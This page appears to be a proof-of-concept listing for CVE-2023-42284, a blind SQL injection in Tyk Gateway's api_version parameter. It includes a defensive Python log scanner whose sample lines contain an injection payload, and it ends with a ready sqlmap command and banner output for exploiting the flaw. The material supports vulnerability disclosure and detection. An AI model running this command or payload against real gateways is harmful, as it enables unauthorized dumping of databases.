CVE-2023-42284 PoC — Tyk Gateway Security Vulnerability

Source
Associated Vulnerability
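Title: Tyk Gateway Security Vulnerability (CVE-2023-42284)
Description: Tyk Gateway is an open-source, cloud-native API gateway from Tyk Technologies. Tyk Gateway version 5.0.3 contains a security vulnerability. An attacker can exploit it to access and dump the database through specially crafted SQL queries.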
Description
  Proof of concept for CVE-2023-42284 in Tyk Gateway 
Readme
# Disclaimer
For educational purposes only!

## Details
Proof of concept for CVE-2023-42284.
Tyk Gateway is vulnerable to SQL injection.
Fixed in version 5.0.7.

The URL parameter `api_version` of `https://<YOUR_URL>/api/errors/count/...?res=day&p=...&api_version=<PAYLOAD_HERE>&api_id=...` is vulnerable to blind SQL injection.
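
For defenders, requests to this endpoint can be reviewed in gateway or reverse-proxy access logs. The following is an added example, not part of the original README or of Tyk's code; the combined log format, the allow-list of characters for `api_version` values and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate api_version labels (e.g. "Non Versioned", "v1.2") use
# only letters, digits, space, dot, dash and underscore.
SAFE_VERSION = re.compile(r"[A-Za-z0-9 ._-]{1,64}")
ENDPOINT_PREFIX = "/api/errors/count/"  # endpoint path named in the README
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_api_version(request_target):
    """Return decoded api_version values that fall outside the allow-list."""
    parts = urlsplit(request_target)
    if not parts.path.startswith(ENDPOINT_PREFIX):
        return []
    # parse_qs percent-decodes each value before the allow-list check.
    values = parse_qs(parts.query).get("api_version", [])
    return [v for v in values if not SAFE_VERSION.fullmatch(v)]

def scan(log_lines):
    """Return (line_number, client_ip, bad_values) for each flagged request."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        bad = suspicious_api_version(m.group(1))
        if bad:
            hits.append((n, line.split(" ", 1)[0], bad))
    return hits

# Constructed sample access-log lines, not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [08/Nov/2022:10:00:01 +0000] "GET /api/errors/count/11/8/2022/13/1/2022?res=day&p=-1&api_version=Non%20Versioned&api_id=abc123 HTTP/1.1" 200 512',
    '203.0.113.9 - - [08/Nov/2022:10:00:07 +0000] "GET /api/errors/count/11/8/2022/13/1/2022?res=day&p=-1&api_version=Non%20Versioned%27%20AND%201%3D1--&api_id=abc123 HTTP/1.1" 200 512',
    '203.0.113.9 - - [08/Nov/2022:10:00:09 +0000] "GET /api/other?api_version=%27 HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for n, ip, bad in scan(SAMPLE_LOG):
        print(f"line {n}: {ip} sent api_version={bad!r}")
```

Hits on this endpoint from a gateway older than 5.0.7 are worth correlating with database logs for the same time window.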

## Exploitation

Use sqlmap with the following parameters:

```
python.exe .\sqlmap.py -u "https://<INSERT YOUR URL>/api/errors/count/11/8/2022/13/1/2022?res=day&p=-1&api_version=Non%20Versioned&api_id=<INSERT YOUR API_ID>" -p "api_version" --cookie="<INSERT COOKIE HERE>" --banner
```

The SQL database banner is returned in the response:

```
...
banner: Postgresql 13.01 on x86_64-pc-linux-gnu
...
```